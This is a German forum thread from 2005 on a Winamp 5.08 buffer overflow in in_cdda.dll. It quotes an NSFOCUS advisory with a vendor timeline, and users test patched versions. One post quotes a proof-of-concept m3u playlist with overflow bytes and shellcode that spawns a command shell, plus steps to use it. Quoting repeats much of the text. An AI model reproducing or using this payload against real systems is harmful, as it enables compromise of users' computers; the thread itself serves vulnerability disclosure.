Seite 1 von 1
Erneut Sicherheitslücke In Winamp Exploit in in_cdda.dll
#1
geschrieben 01. Februar 2005 - 16:13
Auch in der neuesten Version von Winamp , 5.08, ist nun wieder eine Lücke aufgetaucht.
Diese ist ähnlich der Lücke aus der Version 5.05. Auch diesesmal wird man durch einen Exploit eine Remoteshell geöffnet. Dies geschieht durch das öffnen einer manipulierten m3u Playlist die einen Bufferoverflow verursacht.
Quelle
Diese ist ähnlich der Lücke aus der Version 5.05. Auch diesesmal wird man durch einen Exploit eine Remoteshell geöffnet. Dies geschieht durch das öffnen einer manipulierten m3u Playlist die einen Bufferoverflow verursacht.
Quelle
Anzeige
#2 _Guest_
geschrieben 02. Februar 2005 - 23:12
panikmacher eine reise durch 3 foren ergab:
1) http://neworder.box....hp?newsid=13170
Winamp Exploit (POC) 5.08 Stack Overflow
2) http://foro.elhacker...ic,55422.0.html
Winamp 5.08 Stack overflow in in_cdda.dll
mein freund google übersetzt: I have not proven it in other versions of Windows
3) http://security.nnov....asp?docid=7693
NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
mein test:
XP-SP2 (DEP (software/AXP) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
XP-SP2 (DEP (hardware/A64) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
1) http://neworder.box....hp?newsid=13170
Winamp Exploit (POC) 5.08 Stack Overflow
Zitat
Should spawn a shell in a WinXP SP1 with Winamp 5.08
#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP]ø
SÿÐ
(for example, i have used the "demo" archive, DJ Mike Llama and edit the PLAY LIST ENTRY)
And save as *.m3u file, if you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear
#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP]ø
SÿÐ
(for example, i have used the "demo" archive, DJ Mike Llama and edit the PLAY LIST ENTRY)
And save as *.m3u file, if you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear
2) http://foro.elhacker...ic,55422.0.html
Winamp 5.08 Stack overflow in in_cdda.dll
Zitat
Win XP SP1 (creo xDD, no la he probado en otras versiones de Windows).
mein freund google übersetzt: I have not proven it in other versions of Windows
3) http://security.nnov....asp?docid=7693
NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
Zitat
Affected systems & software
===========================
Nullsoft WinAMP 5.0
Nullsoft WinAMP 5.01
Nullsoft WinAMP 5.02
Nullsoft WinAMP 5.03
Nullsoft WinAMP 5.04
Nullsoft WinAMP 5.05
Nullsoft WinAMP 5.06
Nullsoft WinAMP 5.07
Nullsoft WinAMP 5.08
Unaffected systems & software
=============================
Nullsoft WinAMP 2.X
Nullsoft WinAMP 5.08c
Vendor Status
==============
2004.11.24 Informed the vendor support@winamp.com, no response
2004.12.06 Tests proved winamp 5.07 is affected, informed the vendor again
2004.12.07 The vendor confirmed the vulnerability
2004.12.25 Tests proved winamp 5.08 is affected, informed the vendor
2005.01.10 The vendor released winamp 5.08c to fix the vulnerability
The vendor has released winamp 5.08c to fix this vulnerability. The latest
version is available at http://www.winamp.com/player/
===========================
Nullsoft WinAMP 5.0
Nullsoft WinAMP 5.01
Nullsoft WinAMP 5.02
Nullsoft WinAMP 5.03
Nullsoft WinAMP 5.04
Nullsoft WinAMP 5.05
Nullsoft WinAMP 5.06
Nullsoft WinAMP 5.07
Nullsoft WinAMP 5.08
Unaffected systems & software
=============================
Nullsoft WinAMP 2.X
Nullsoft WinAMP 5.08c
Vendor Status
==============
2004.11.24 Informed the vendor support@winamp.com, no response
2004.12.06 Tests proved winamp 5.07 is affected, informed the vendor again
2004.12.07 The vendor confirmed the vulnerability
2004.12.25 Tests proved winamp 5.08 is affected, informed the vendor
2005.01.10 The vendor released winamp 5.08c to fix the vulnerability
The vendor has released winamp 5.08c to fix this vulnerability. The latest
version is available at http://www.winamp.com/player/
mein test:
XP-SP2 (DEP (software/AXP) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
XP-SP2 (DEP (hardware/A64) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
#3
geschrieben 04. Februar 2005 - 19:27
Zitat (Guest: 02.02.2005, 23:12)
panikmacher eine reise durch 3 foren ergab:
1) http://neworder.box....hp?newsid=13170
Winamp Exploit (POC) 5.08 Stack Overflow
2) http://foro.elhacker...ic,55422.0.html
Winamp 5.08 Stack overflow in in_cdda.dll
mein freund google übersetzt: I have not proven it in other versions of Windows
3) http://security.nnov....asp?docid=7693
NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
mein test:
XP-SP2 (DEP (software/AXP) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
XP-SP2 (DEP (hardware/A64) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
<{POST_SNAPBACK}>
1) http://neworder.box....hp?newsid=13170
Winamp Exploit (POC) 5.08 Stack Overflow
2) http://foro.elhacker...ic,55422.0.html
Winamp 5.08 Stack overflow in in_cdda.dll
mein freund google übersetzt: I have not proven it in other versions of Windows
3) http://security.nnov....asp?docid=7693
NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
mein test:
XP-SP2 (DEP (software/AXP) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
XP-SP2 (DEP (hardware/A64) für alle programme)
Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
<{POST_SNAPBACK}>
Der Poc der auf den meisten Seiten zu test zwecken angeboten wird, führt klar nicht zu einer Remoteshell, sondern lediglich zum abschmieren von Winamp. Jedoch kann jeder mittelmässiger Programmierer sich das Skript umbauen und bösartigen Code einschleußen um somit z.B. eine Remoteshell zu öffnen. Wäre ja auch lachhaft wenn sich jeder auf den "offizielen" Seiten ein fertiges Skript besorgen könnte um einen Rechner zu übernehmen. Es gibt es zwar trotzdem manchmal, jedoch werden meistens die Poc's gecutet um nur den eigentlichen Buffer Overflow zu zeigen.
Dieser Beitrag wurde von pSyCHo_SolDiEr bearbeitet: 04. Februar 2005 - 19:29
#4
geschrieben 05. Februar 2005 - 12:37
Zitat (pSyCHo_SolDiEr: 01.02.2005, 16:13)
Auch in der neuesten Version von Winamp , 5.08, ist nun wieder eine Lücke aufgetaucht.
Quelle
<{POST_SNAPBACK}>
Quelle
<{POST_SNAPBACK}>
Etwas genauer bitte: Steckt diese Lücke auch noch in der neuesten Version 5.08d ?
5.08 alleine reicht mir nicht.
#5
geschrieben 05. Februar 2005 - 14:15
Nein 5.08 d ist safe, genauso wie die c. nur die erste Version der 5.08er ist unsafe.
#6
geschrieben 05. Februar 2005 - 14:33
Zitat (pSyCHo_SolDiEr: 05.02.2005, 14:15)
Nein 5.08 d ist safe, genauso wie die c. nur die erste Version der 5.08er ist unsafe.
<{POST_SNAPBACK}>
<{POST_SNAPBACK}>
Ok. Vielen Dank für die Information.
Thema verteilen:
Seite 1 von 1